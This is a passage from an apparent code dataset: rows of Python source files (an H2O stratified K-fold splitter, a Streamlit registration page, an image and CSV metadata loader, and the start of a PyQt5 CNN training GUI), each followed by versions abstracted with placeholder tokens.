y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n <function token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 
'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n <docstring token>\n <function token>\n <function token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n <function token>\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n <function token>\n <function token>\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n <function token>\n <function token>\n <function token>\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n" ]
false
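A note on the H2OStratifiedKFold entry above: the fold construction mirrors scikit-learn's StratifiedKFold, rebuilt per class with KFold (the SK18 branch targets scikit-learn >= 0.18, where KFold gained a split() method). Two details worth flagging: np.int was removed in NumPy 1.24, so on current NumPy test_folds should be allocated with dtype=int, and the ValueError near the top is raised with a stray Warning argument, apparently copied from the warnings.warn call just below it. A minimal usage sketch, assuming the _H2OBaseKFold base class (tokenized out of this row) yields (train_indices, test_indices) pairs the way scikit-learn splitters do, and that a local H2O cluster can be started:

import h2o

h2o.init()                                   # assumes a local H2O cluster is available
frame = h2o.import_file("iris.csv")          # hypothetical file with a "species" column
cv = H2OStratifiedKFold(n_folds=3, shuffle=True, random_state=42)
for train_idx, test_idx in cv.split(frame, "species"):
    # each fold should preserve the class balance of "species";
    # rows are selected by index list, which H2OFrame slicing supports
    train, test = frame[list(train_idx), :], frame[list(test_idx), :]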
7
41cfd558824b6561114a48a694b1e6e6a7cb8c05
import streamlit as st from streamlit.components.v1 import components from streamlit.report_thread import get_report_ctx from util.session import * from multipage import MultiPage from pages import register def app(page): if not login_status(): title_container = st.empty() remail_input_container = st.empty() rpw_input_container = st.empty() rregister_button_container = st.empty() # title_container.write("Register") email = remail_input_container.text_input("Email ") password = rpw_input_container.text_input("Password ", type="password") rregister_button = rregister_button_container.button('Register') if rregister_button: title_container.empty() remail_input_container.empty() rpw_input_container.empty() rregister_button_container.empty() login() page.app() st.experimental_rerun()
[ "import streamlit as st\nfrom streamlit.components.v1 import components\nfrom streamlit.report_thread import get_report_ctx\nfrom util.session import *\nfrom multipage import MultiPage\nfrom pages import register\n\ndef app(page):\n if not login_status():\n title_container = st.empty()\n remail_input_container = st.empty()\n rpw_input_container = st.empty()\n rregister_button_container = st.empty()\n\n # title_container.write(\"Register\")\n email = remail_input_container.text_input(\"Email \")\n password = rpw_input_container.text_input(\"Password \", type=\"password\")\n rregister_button = rregister_button_container.button('Register')\n\n if rregister_button:\n title_container.empty()\n remail_input_container.empty()\n rpw_input_container.empty()\n rregister_button_container.empty()\n login()\n page.app()\n st.experimental_rerun()", "import streamlit as st\nfrom streamlit.components.v1 import components\nfrom streamlit.report_thread import get_report_ctx\nfrom util.session import *\nfrom multipage import MultiPage\nfrom pages import register\n\n\ndef app(page):\n if not login_status():\n title_container = st.empty()\n remail_input_container = st.empty()\n rpw_input_container = st.empty()\n rregister_button_container = st.empty()\n email = remail_input_container.text_input('Email ')\n password = rpw_input_container.text_input('Password ', type='password')\n rregister_button = rregister_button_container.button('Register')\n if rregister_button:\n title_container.empty()\n remail_input_container.empty()\n rpw_input_container.empty()\n rregister_button_container.empty()\n login()\n page.app()\n st.experimental_rerun()\n", "<import token>\n\n\ndef app(page):\n if not login_status():\n title_container = st.empty()\n remail_input_container = st.empty()\n rpw_input_container = st.empty()\n rregister_button_container = st.empty()\n email = remail_input_container.text_input('Email ')\n password = rpw_input_container.text_input('Password ', type='password')\n rregister_button = rregister_button_container.button('Register')\n if rregister_button:\n title_container.empty()\n remail_input_container.empty()\n rpw_input_container.empty()\n rregister_button_container.empty()\n login()\n page.app()\n st.experimental_rerun()\n", "<import token>\n<function token>\n" ]
false
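The register page in the entry above leans on two helpers imported from util.session that are not part of this row: login_status() and login(). A minimal sketch of what they could look like, assuming Streamlit's st.session_state is available; the helper bodies and the "logged_in" key are hypothetical, not taken from the source repository (note also that st.experimental_rerun() has since been superseded by st.rerun() in newer Streamlit releases):

import streamlit as st

def login_status() -> bool:
    # hypothetical helper: report whether this browser session has logged in
    return st.session_state.get("logged_in", False)

def login() -> None:
    # hypothetical helper: mark the session as logged in
    st.session_state["logged_in"] = True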
8
f2bb44600f011a205c71985ad94c18f7e058634f
import os import requests from PIL import Image from io import BytesIO import csv from typing import Iterable, List, Tuple, Dict, Callable, Union, Collection # pull the image from the api endpoint and save it if we don't have it, else load it from disk def get_img_from_file_or_url(img_format: str = 'JPEG') -> Callable[[str, str], Image.Image]: def _apply(filepath: str, url: str) -> Image.Image: img = from_file(filepath) if img is None: img = from_url(url) img.save(filepath, img_format) return img.convert('RGB') # convert to rgb if not already (eg if grayscale) return _apply def from_url(url: str) -> Image.Image: api_response = requests.get(url).content response_bytes = BytesIO(api_response) return Image.open(response_bytes) def from_file(path: str) -> Union[Image.Image, None]: if os.path.exists(path): return Image.open(path) else: return None def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[int] = tuple(), valid_only: bool = True, **reader_args)\ -> Tuple[List, int, List, List[Dict[str, int]], List[Dict[int, str]], int]: metadata = [] # one dict for each class col class_to_index: List[Dict[str, int]] = [{}] * len(class_cols) index_to_class: List[Dict[int, str]] = [{}] * len(class_cols) next_indices = [0] * len(class_cols) # next index for a new class value with open(path, 'r', newline='', encoding="utf8") as metadata_file: reader = csv.reader(metadata_file, **reader_args) headers = next(reader) for row in reader: if len(row) != 0: metadatum = [row[c] for c in cols] # for all class cols, add their vals to the class_to_index and index_to_class dicts if not there already for c, class_col in enumerate(class_cols): if not row[class_col] in class_to_index[c]: class_to_index[c][row[class_col]] = next_indices[c] index_to_class[c][next_indices[c]] = row[class_col] next_indices[c] += 1 if valid_only and '' in metadatum: continue metadata.append(metadatum) len_metadata = len(metadata) num_classes = 0 if len(next_indices) == 0 else next_indices[-1] # split off the headers return metadata, len_metadata, headers, class_to_index, index_to_class, num_classes
[ "import os\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport csv\nfrom typing import Iterable, List, Tuple, Dict, Callable, Union, Collection\n\n\n# pull the image from the api endpoint and save it if we don't have it, else load it from disk\ndef get_img_from_file_or_url(img_format: str = 'JPEG') -> Callable[[str, str], Image.Image]:\n def _apply(filepath: str, url: str) -> Image.Image:\n img = from_file(filepath)\n if img is None:\n img = from_url(url)\n img.save(filepath, img_format)\n return img.convert('RGB') # convert to rgb if not already (eg if grayscale)\n return _apply\n\n\ndef from_url(url: str) -> Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) -> Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[int] = tuple(), valid_only: bool = True, **reader_args)\\\n -> Tuple[List, int, List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n # one dict for each class col\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols) # next index for a new class value\n with open(path, 'r', newline='', encoding=\"utf8\") as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n # for all class cols, add their vals to the class_to_index and index_to_class dicts if not there already\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n # split off the headers\n return metadata, len_metadata, headers, class_to_index, index_to_class, num_classes\n", "import os\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport csv\nfrom typing import Iterable, List, Tuple, Dict, Callable, Union, Collection\n\n\ndef get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],\n Image.Image]:\n\n def _apply(filepath: str, url: str) ->Image.Image:\n img = from_file(filepath)\n if img is None:\n img = from_url(url)\n img.save(filepath, img_format)\n return img.convert('RGB')\n return _apply\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[\n int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,\n List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols)\n with open(path, 'r', newline='', encoding='utf8') as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 
0:\n metadatum = [row[c] for c in cols]\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n return (metadata, len_metadata, headers, class_to_index, index_to_class,\n num_classes)\n", "<import token>\n\n\ndef get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],\n Image.Image]:\n\n def _apply(filepath: str, url: str) ->Image.Image:\n img = from_file(filepath)\n if img is None:\n img = from_url(url)\n img.save(filepath, img_format)\n return img.convert('RGB')\n return _apply\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[\n int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,\n List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols)\n with open(path, 'r', newline='', encoding='utf8') as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n return (metadata, len_metadata, headers, class_to_index, index_to_class,\n num_classes)\n", "<import token>\n<function token>\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[\n int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,\n List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols)\n with open(path, 'r', newline='', encoding='utf8') as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if 
len(next_indices) == 0 else next_indices[-1]\n return (metadata, len_metadata, headers, class_to_index, index_to_class,\n num_classes)\n", "<import token>\n<function token>\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\n<function token>\n", "<import token>\n<function token>\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\n<function token>\n<function token>\n", "<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n" ]
false
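Two things worth flagging in the image/metadata entry above: [{}] * len(class_cols) builds a list of references to one shared dict, so with more than one class column every column writes into the same mapping ([{} for _ in class_cols] would keep them separate), and num_classes is taken from the last class column only. A small usage sketch built only from the signatures shown; the file name and column layout are illustrative, not from the source:

# hypothetical metadata.csv laid out as: id,url,label
metadata, n, headers, cls_to_idx, idx_to_cls, num_classes = load_metadata(
    "metadata.csv",
    cols=[0, 1, 2],
    class_cols=(2,),          # build label<->index maps for the label column
    delimiter=",",            # forwarded to csv.reader via **reader_args
)
fetch = get_img_from_file_or_url("JPEG")
img = fetch("cache/0.jpg", metadata[0][1])    # loads from disk if cached, else downloads and saves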
9
302605d8bb45b1529742bf9441d476f0276085b9
import sys from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox) from PyQt5.QtCore import Qt from PyQt5.QtGui import QFont, QColor import myLoadData from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\ showJudgeWidgets, chooseJudgeDataSetWidget from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement class MyMainWindow(QMainWindow): def __init__(self): super().__init__() self.windowLength = 1250 self.windowHigh = 900 self.fname = dict() self.fname['New'] = None self.fname['Tra'] = None self.dataLossRate = dict() self.dataSetLossValue = dict() self.dataFor = dict() self.dataFor['New'] = None self.dataLossRate['New'] = 0. self.dataSetLossValue['New'] = 0. self.dataFor['Tra'] = None self.dataLossRate['Tra'] = 0. self.dataSetLossValue['Tra'] = 0. self.traingWidgetOnFlag = dict() self.traingWidgetOnFlag['New'] = False self.traingWidgetOnFlag['Tra'] = False self.combineNumConv = 2 self.convCoreNum = 5 self.combineNumPooling = 4 self.fullConnectOutInRate = 0.5 self.mcbcnn = None self.trann = None self.trainingW = None self.trainingWT = None self.initUI() self.initConnect() def initUI(self): self.statusBar().showMessage('Ready') ####### data module ####### dataModule = QVBoxLayout() self.dataFileChooseButton = QPushButton('选择数据') self.dataFileChooseButton.setFont(QFont('微软雅黑', 16)) self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数') self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16)) self.dataShowButton = QPushButton('展示数据') self.dataShowButton.setFont(QFont('微软雅黑', 